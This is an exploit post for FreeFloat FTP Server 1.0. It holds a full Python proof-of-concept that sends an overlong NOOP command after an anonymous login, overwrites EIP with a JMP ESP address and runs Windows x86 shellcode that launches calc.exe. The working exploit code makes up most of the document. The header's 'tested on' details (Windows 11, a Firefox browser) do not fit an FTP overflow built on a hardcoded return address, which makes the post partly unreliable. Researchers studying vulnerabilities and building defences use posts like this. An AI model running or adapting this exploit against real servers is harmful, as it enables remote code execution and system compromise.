=============================================================================================================================================
| # Title     : FreeFloat FTP Server 1.0 Buffer Overflow Exploit via NOOP Command (Windows x86)                                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://archive.org/details/tucows_367516_Freefloat_FTP_Server                                                              |
=============================================================================================================================================

[+] Summary    : This Python script demonstrates a proof‑of‑concept (PoC) buffer overflow exploit targeting a vulnerable FTP server running on port 21. 
                 The exploit works by sending an overly long payload through the NOOP FTP command, which overflows the server’s buffer and allows control of the EIP (Extended Instruction Pointer).

The payload is constructed in several stages:

Padding (246 bytes) – Fills the buffer until reaching the EIP overwrite offset.

EIP overwrite – Replaces the return address with a JMP ESP instruction from a loaded module, redirecting execution to attacker‑controlled memory.

NOP sled – A sequence of NOP instructions (0x90) to increase reliability by sliding execution toward the shellcode.

Shellcode – A Windows x86 payload that launches calc.exe, demonstrating successful code execution.

The script connects to the FTP service, performs a basic anonymous login (USER / PASS), and then sends the crafted payload using the NOOP command, triggering the buffer overflow and executing the shellcode on the target system.
			  
[+] POC   : 


import socket
import sys

target_ip = "127.0.0.1"  
port = 21

padding = b"A" * 246 
eip = b"\xed\x1e\x95\x7c" 

nop_sled = b"\x90" * 20
shellcode = (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08"
    b"\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78"
    b"\x3c\x8b\x57\x78\x01\xd2\x8b\x5a\x20\x01\xd3\x8b\x4a\x18\xe3"
    b"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    b"\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x8b"
    b"\x5a\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xd3\x8b\x04"
    b"\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0"
    b"\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"
    b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
    b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"
    b"\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e"
    b"\x65\x78\x65\x00"
)

payload = padding + eip + nop_sled + shellcode

try:
    print(f"[*] Connecting to {target_ip}...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, port))
    s.recv(1024)

    print("[*] Sending malicious command...")

    s.send(b"USER anonymous\r\n")
    s.recv(1024)
    s.send(b"PASS anonymous\r\n")
    s.recv(1024)
    s.send(b"NOOP " + payload + b"\r\n")
    
    print("[+] Exploit sent successfully!")
    s.close()

except Exception as e:
    print(f"[-] Could not connect: {e}")

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================